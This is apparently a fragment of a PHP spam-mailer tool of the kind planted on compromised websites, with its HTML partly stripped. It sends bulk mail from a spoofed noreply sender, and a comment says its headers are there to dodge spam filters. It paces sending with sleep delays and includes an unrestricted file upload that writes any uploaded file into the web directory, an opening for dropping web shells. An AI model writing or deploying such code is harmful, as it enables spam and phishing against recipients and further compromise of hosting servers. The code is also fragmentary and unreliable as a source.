hola my friend, How are u ?

"; $subject = $_SERVER["HTTP_HOST"]; $nombre = "lokomania"; $de = "noreply@publimailer.com"; $ellos = "piwinet2018@hotmail.com"; } ?> Mailer_2021-Piwin3tRlZ

Email: Nombre:
Asunto:


'; if (isset($_POST["action"]) && $_POST["action"] == "upload") { $archivo = $_FILES["archivo"]['name']; if ($archivo != "") { if (copy($_FILES['archivo']['tmp_name'],"./".$archivo)) { echo "Archivo subido: ".$archivo.""; }else{ echo "Error al subir el archivo"; } } } } if(!isset($_POST['Enoc'])){ exit; } $emails = (isset($_GET['c'])) ? explode(",", $ellos) : explode("\n", $ellos); $son = count($emails); // Headers estándar para evitar filtros de spam $header = "MIME-Version: 1.0" . "\r\n"; $header .= "Content-type: text/html; charset=iso-8859-1" . "\r\n"; $header .= "From: ".$nombre . " <" . $de . ">" . "\r\n"; $header .= "Reply-To: " . $de . "\r\n"; $header .= "X-Mailer: PHP/" . phpversion(); $i = 0; $voy = 1; foreach($emails as $email) { $email = trim($email); if(empty($email)) continue; if(isset($_GET['time']) && isset($_GET['cant'])){ if(fmod($i,$_GET['cant'])==0 && $i>0){ echo "----------------------------------> wait ".$_GET['time']." Segs...
\n"; flush(); sleep((int)$_GET['time']); } } $message1 = str_replace('%email%', $email, $message); if(@mail($email, $subject, $message1, $header)) { echo " ".$voy." de ".$son." ;-) ".$email." Enviado...!
\n"; } else { echo " ".$voy." de ".$son.":-( ".$email." Error de envio!!
\n"; } flush(); $i++; $voy++; } echo ""; ?>